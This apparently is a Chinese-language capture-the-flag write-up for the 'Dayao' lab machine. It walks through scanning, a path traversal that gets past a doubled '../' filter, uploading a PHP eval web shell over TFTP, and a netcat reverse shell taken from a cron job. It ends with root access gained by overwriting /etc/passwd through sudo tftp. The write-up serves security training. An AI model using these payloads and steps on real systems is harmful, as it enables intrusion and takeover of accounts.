Dayao靶机复盘

一.信息收集

1.1 端口扫描：

┌──(root㉿kali)-[~]
└─# nmap -sV -sS -A 192.168.209.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 04:49 EDT
Nmap scan report for 192.168.209.13
Host is up (0.00076s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE2\x9C\xA7\xEF\xBD\xA5\xEF\xBE\x9F: *\xE2\x9C\xA7\xEF\xBD\xA5\xEF\xBE\x9F:* FILE TRANSFER *:\xEF\xBD\xA5\xEF\xBE\x9F\xE2\x9C\xA7*:\xEF\xBD\xA5\xEF\xBE\x9F\xE2\x9C\xA7
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:A2:4A:F2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.209.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds

直接去Web界面进行查看，让我们去上传文件，但是没有找到入口

1.2 目录扫描：

┌──(root?kali)-[~]
└─# gobuster dir -u http://192.168.209.13 -w /usr/share/wordlists/dirb/common.txt -t 50 -x .php 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.209.13
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/file.php             (Status: 200) [Size: 0]
/index.html           (Status: 200) [Size: 2078]
/.htaccess.php        (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/upload.php           (Status: 200) [Size: 0]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.209.13/uploads/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

二. getshell

扫到了file.php文件，打开时发现为空，使用wfuzz进行FUZZ一下

┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wordlists/dirb/common.txt  -u http://192.168.209.13/file.php?FUZZ=....//....//....//....//....//....//etc/passwd --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.209.13/file.php?FUZZ=....//....//....//....//....//....//etc/passwd
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000001601:   200        27 L     40 W       1483 Ch     "file"                        

靶机使用了双写绕过，最终的结果是file参数，查看一下etc/passwd

┌──(root㉿kali)-[~]
└─# curl http://192.168.209.13/file.php?file=....//....//....//....//....//....//etc//passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tftp:x:106:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash

发现了tftp用户，猜测有可能会开启tftp的服务，tftp对应的端口号是69

┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.209.13 -p 69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 07:49 EDT
Nmap scan report for 192.168.209.13
Host is up (0.00082s latency).

PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 08:00:27:A2:4A:F2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds

进入tftp，发现ls命令没有效果，但是可以get下来，也证实了双写的绕过，尝试上传一句话木马

┌──(root㉿kali)-[~]
└─# tftp 192.168.209.13
tftp> ls
?Invalid command
tftp> get file.php
tftp> 
tftp> ^[?Invalid command
tftp> 
┌──(root㉿kali)-[~]
└─# cat file.php
<?php
// vuln.php
if(isset($_GET['file'])) {
    $file = $_GET['file'];
    // 过滤../防止目录遍历（故意留缺陷）
    $file = str_replace('../', '', $file);
    // 使用file_get_contents实现文件读取
    echo file_get_contents('/var/www/html/'.$file);
}
?>

上传：

┌──(root㉿kali)-[/tmp]
└─# cat aaa.php 
<?php @eval($_POST['hack']);?>

┌──(root㉿kali)-[/tmp]
└─# tftp 192.168.209.13
tftp> put aaa.php
tftp> 

使用蚁剑进行连接

传入pspy6，发现可以直接利用反弹shell

2025/05/27 08:07:43 CMD: UID=0    PID=17769  | /bin/sh /sbin/dhclient-script 
2025/05/27 08:07:43 CMD: UID=0    PID=17770  | /bin/sh /sbin/dhclient-script 
2025/05/27 08:08:01 CMD: UID=0    PID=17771  | /usr/sbin/CRON -f 
2025/05/27 08:08:01 CMD: UID=0    PID=17772  | /usr/sbin/CRON -f 
2025/05/27 08:08:01 CMD: UID=1000 PID=17773  | /bin/sh -c nc -e /bin/bash 127.0.0.1 1234 
^CExiting program... (interrupt)
www-data@Dayao:/tmp$ nc -lvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:60514.
uid=1000(wujing) gid=1000(wujing) groups=1000(wujing)

拿下完整的shell，写公钥：

wujing@Dayao:~$ mkdir .ssh
wujing@Dayao:~$ cd .ssh
wujing@Dayao:~/.ssh$ echo "ssh-rsa ......" > authorized_keys

使用ssh进行连接：

──(root㉿kali)-[~/.ssh]
└─# ssh wujing@192.168.209.13
Linux Dayao 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 27 04:18:47 2025 from 192.168.209.222
wujing@Dayao:~$ ls
user.txt
wujing@Dayao:~$ sudo -l
Matching Defaults entries for wujing on Dayao:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wujing may run the following commands on Dayao:
    (ALL) NOPASSWD: /usr/bin/tftp
wujing@Dayao:~$ 

发现了tftp是sudo权限，进行利用

三. 提权：

在/var/www/html 目录上进行修改/etc/passwd的内容，把root的密码改为已知的密码（openssl passwd 生成密码）

流程如下：

wujing@Dayao:/var/www/html$ cd /etc
wujing@Dayao:/etc$ sudo tftp 127.0.0.1  //使用sudo权限
tftp> get passwd     //写入任意文件（原理和之前直接拿file.php类似）
Received 1510 bytes in 0.0 seconds
tftp> wujing@Dayao:/etc$ 

wujing@Dayao:/etc$ cat passwd
root:$1$UIak.Duf$5aTSAlgZw/PPwcPxiwMdj1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tftp:x:106:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash
wujing@Dayao:/etc$ su - root
Password: 
root@Dayao:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Dayao:~#